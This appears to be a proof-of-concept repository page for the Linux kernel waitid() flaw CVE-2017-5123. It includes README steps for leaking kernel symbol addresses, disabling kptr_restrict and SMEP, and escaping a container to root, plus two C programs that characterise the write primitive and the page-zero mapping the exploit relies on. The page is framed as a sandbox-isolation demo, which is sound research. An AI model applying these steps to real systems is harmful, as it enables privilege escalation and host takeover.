CVE-2017-5123 PoC — Linux kernel input validation error vulnerability

Associated Vulnerability
Title: Linux kernel input validation error vulnerability (CVE-2017-5123)
Description: The Linux kernel is the kernel used by Linux, the open-source operating system of the Linux Foundation. The Linux kernel contains an input validation error vulnerability. A local attacker can exploit this vulnerability to obtain root privileges.
Readme
# README

> **Note**: The code in this repo is to demo the isolation of secure pod sandbox technologies such as [kata containers](https://kata-containers.io) and does not intend to attack any platforms.

## How to reproduce
* Get Linux kernel 4.13.0
* Apply 0001-CVE-2017-5123-help-to-make-attack-safely.patch
* Build the Linux kernel with the config file Kconfig
* Boot the kernel and get the addresses of dac_mmap_min_addr, have_canfork_callback, prepare_kernel_cred, commit_creds, set_fs_root, copy_fs_struct and current_task with the following commands (kptr_restrict must be 0 so that /proc/kallsyms shows real addresses to an unprivileged reader), then update the addresses in CVE-2017-5123.c:
```
echo 0 > /proc/sys/kernel/kptr_restrict
grep -wE 'dac_mmap_min_addr|have_canfork_callback|prepare_kernel_cred|commit_creds|set_fs_root|copy_fs_struct|current_task' /proc/kallsyms
```
* gdb vmlinux
* Get the offset TASK_FS_OFFSET (the pointer value gdb prints for a member of a struct at address 0 is that member's offset) and update it in CVE-2017-5123.c:
```
(gdb) p &(((struct task_struct *)0)->fs)
```
* Get the offset TASK_PARENT_OFFSET and update it in CVE-2017-5123.c:
```
(gdb) p &(((struct task_struct *)0)->parent)
```
* Get the offset FS_ROOT_OFFSET and update it in CVE-2017-5123.c:
```
(gdb) p &(((struct fs_struct *)0)->root)
```
* Build CVE-2017-5123.c statically (gcc -static) and put the binary into a docker image.
* Boot the kernel with the kernel command line option "nosmep" (the shellcode lives in a user-space page, which SMEP would otherwise stop the kernel from executing).
* Now run the docker image and rock and roll.

## About this CVE

The waitid() implementation in Linux 4.13 copied the result siginfo to the user-supplied infop pointer with unsafe_put_user() without first checking that pointer with access_ok(), so infop could point anywhere, including into kernel memory. A local user can therefore write to otherwise protected kernel memory, which leads to privilege escalation.<br>
The bug was introduced on 2017-05-21 and fixed on 2017-10-09.

This CVE has already been fixed in later releases of the 4.13 branch and in newer mainline kernels. However, similar bugs that allow privilege escalation may still exist. In its effect, a local write primitive that ends in root, the CVE is actually quite similar to the famous [dirty cow, CVE-2016-5195](https://dirtycow.ninja/).
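As an added example (not code from the PoC repository), the following program shows from user space exactly what the waitid() copy-out writes: it reaps a child whose exit code it chose into a buffer pre-filled with 0xAA and reports which bytes the kernel changed. On a vulnerable 4.13 kernel the same six stores land wherever infop points, so the table it prints is the attacker's write primitive: which bytes are written, and which of them the caller controls. It assumes Linux with a glibc-style siginfo_t; the names WAITID_STORES, waitid_write_span and probe_waitid are this example's own.

```c
/* waitid_primitive.c - dump exactly what waitid() writes through *infop.
 * Added example, not from the PoC repo: the six stores kernel/exit.c makes
 * with unsafe_put_user(), observed on a patched kernel by pointing infop at a
 * user buffer instead of at kernel memory.
 * Build: gcc -Wall -o waitid_primitive waitid_primitive.c && ./waitid_primitive
 */
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fallbacks for strict -std modes that hide the XSI names (Linux values). */
#ifndef P_PID
#define P_PID 1
#endif
#ifndef WEXITED
#define WEXITED 4
#endif
#ifndef CLD_EXITED
#define CLD_EXITED 1
#endif

/* One of the stores waitid() performs into *infop. */
struct waitid_store {
    const char *name;
    size_t offset;
    size_t size;
    const char *control;  /* what an unprivileged caller can make the value be */
};

#define STORE(field, ctl) \
    { #field, offsetof(siginfo_t, field), sizeof(((siginfo_t *)0)->field), ctl }

/* The six fields kernel/exit.c writes, in order; nothing else in *infop is touched. */
static const struct waitid_store WAITID_STORES[] = {
    STORE(si_signo,  "fixed: SIGCHLD, or 0 when nothing was reaped"),
    STORE(si_errno,  "fixed: 0"),
    STORE(si_code,   "narrow: CLD_EXITED..CLD_CONTINUED, chosen by how the child ends"),
    STORE(si_pid,    "partial: the reaped child's pid"),
    STORE(si_uid,    "fixed: the child's real uid"),
    STORE(si_status, "one byte: the child's exit code, 0..255"),
};
#define N_WAITID_STORES (sizeof WAITID_STORES / sizeof WAITID_STORES[0])

static const struct waitid_store *waitid_stores(size_t *n)
{
    *n = N_WAITID_STORES;
    return WAITID_STORES;
}

/* How far past infop the primitive reaches: offset + size of the last store. */
static size_t waitid_write_span(void)
{
    size_t span = 0;
    for (size_t i = 0; i < N_WAITID_STORES; i++)
        if (WAITID_STORES[i].offset + WAITID_STORES[i].size > span)
            span = WAITID_STORES[i].offset + WAITID_STORES[i].size;
    return span;
}

struct waitid_probe {
    pid_t child;
    siginfo_t info;
    size_t bytes_changed;  /* bytes of the 0xAA-filled buffer the kernel rewrote */
};

/* Fork a child that exits with exit_code and reap it through waitid() into a
 * buffer pre-filled with 0xAA, so every byte the kernel touched stands out.
 * Returns 0 on success, -1 if fork() or waitid() failed. */
static int probe_waitid(int exit_code, struct waitid_probe *out)
{
    memset(out, 0, sizeof *out);
    memset(&out->info, 0xAA, sizeof out->info);
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(exit_code & 0xff);
    if (waitid(P_PID, pid, &out->info, WEXITED) != 0)
        return -1;
    out->child = pid;
    const unsigned char *p = (const unsigned char *)&out->info;
    for (size_t i = 0; i < sizeof out->info; i++)
        out->bytes_changed += (p[i] != 0xAA);
    return 0;
}

int main(void)
{
    size_t n;
    const struct waitid_store *s = waitid_stores(&n);
    printf("waitid() writes within the first %zu bytes past infop:\n", waitid_write_span());
    for (size_t i = 0; i < n; i++)
        printf("  +%-2zu %-9s %zu bytes  %s\n", s[i].offset, s[i].name, s[i].size, s[i].control);
    struct waitid_probe pr;
    if (probe_waitid(0x41, &pr) != 0) {
        perror("probe_waitid");
        return 1;
    }
    printf("child %d: si_signo=%d si_code=%d si_pid=%d si_uid=%u si_status=0x%02x, "
           "%zu bytes of the buffer changed\n",
           (int)pr.child, pr.info.si_signo, pr.info.si_code, (int)pr.info.si_pid,
           (unsigned)pr.info.si_uid, pr.info.si_status, pr.bytes_changed);
    return 0;
}
```

The useful observation for the exploit is that si_errno is always written as four zero bytes and si_status is a byte the caller picks via the child's exit code, while the remaining stores are fixed or only partly controlled; the primitive is therefore a "write a few known values at an arbitrary address" rather than an arbitrary write.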

## More information

CVE-2017-5123.c uses the vulnerability to overwrite dac_mmap_min_addr, the kernel variable behind /proc/sys/vm/mmap_min_addr, so that an unprivileged process can map a page at a low address. It then gets the Linux kernel to call shellcode placed there (hence the nosmep boot option), which obtains root's file access permissions on the host.
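Why the PoC has to clear dac_mmap_min_addr before anything else, as an added example that is not code from the PoC repository: the program below mirrors the DAC half of the kernel's mmap address check (cap_mmap_addr in security/commoncap.c: an address below dac_mmap_min_addr is refused with EPERM unless the caller has CAP_SYS_RAWIO) as a pure function, reads the live sysctl, and then actually tries to map the page at address 0, which is where the shellcode would have to live. It assumes Linux with /proc mounted; dac_mmap_addr_check, read_mmap_min_addr and try_map_page_zero are this example's own names.

```c
/* mmap_min_addr_gate.c - the gate the PoC opens by zeroing dac_mmap_min_addr.
 * Added example, not from the PoC repo.
 * Build: gcc -Wall -o mmap_min_addr_gate mmap_min_addr_gate.c && ./mmap_min_addr_gate
 */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON
#endif

/* Mirror of the kernel's DAC rule (cap_mmap_addr): 0 if the mapping is
 * allowed, else EPERM.  With min_addr == 0, which is what the exploit
 * writes, every address passes. */
static int dac_mmap_addr_check(unsigned long addr, unsigned long min_addr,
                               int has_sys_rawio)
{
    if (addr < min_addr && !has_sys_rawio)
        return EPERM;
    return 0;
}

/* Read /proc/sys/vm/mmap_min_addr; -1 if it cannot be read. */
static long read_mmap_min_addr(void)
{
    FILE *f = fopen("/proc/sys/vm/mmap_min_addr", "r");
    if (!f)
        return -1;
    long v = -1;
    if (fscanf(f, "%ld", &v) != 1)
        v = -1;
    fclose(f);
    return v;
}

/* Try to map one RWX page at address 0 (the page a NULL function pointer in the
 * kernel would jump to once SMEP is off).  Returns 0 if the kernel allowed it,
 * after unmapping it again, otherwise the errno (EPERM from the DAC rule, or
 * EACCES if an LSM objected). */
static int try_map_page_zero(void)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    void *p = mmap((void *)0, page, PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if (p == MAP_FAILED)
        return errno;
    munmap(p, page);
    return 0;
}

int main(void)
{
    long min_addr = read_mmap_min_addr();
    printf("mmap_min_addr = %ld\n", min_addr);
    if (min_addr >= 0)
        printf("DAC rule for page 0 without CAP_SYS_RAWIO: %s\n",
               dac_mmap_addr_check(0, (unsigned long)min_addr, 0) ? "EPERM" : "allowed");
    int r = try_map_page_zero();
    if (r == 0)
        printf("page 0 mapped: the shellcode target is reachable\n");
    else
        printf("page 0 refused: %s\n", strerror(r));
    return 0;
}
```

On a default system the live attempt prints EPERM because mmap_min_addr is 65536 (or larger); the waitid primitive's guaranteed zero store is enough to turn that limit into 0, after which the same mmap() call succeeds and the kernel can be steered into the attacker's page, which is why the README also requires nosmep.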
File Snapshot

```
[4.0K] /data/pocs/02805c4a3432b5273577a61265dd15a504c6a32d
├── [1.4K] 0001-CVE-2017-5123-help-to-make-attack-safely.patch
├── [4.9K] CVE-2017-5123.c
├── [393K] cve-2017-5123.key
├── [ 32K] hacked.png
├── [ 11M] initrd.img-4.13.0+
├── [ 85K] Kconfig
├── [1.9K] README.md
├── [ 60K] systemok.png
└── [4.5M] vmlinuz-4.13.0+

0 directories, 9 files
```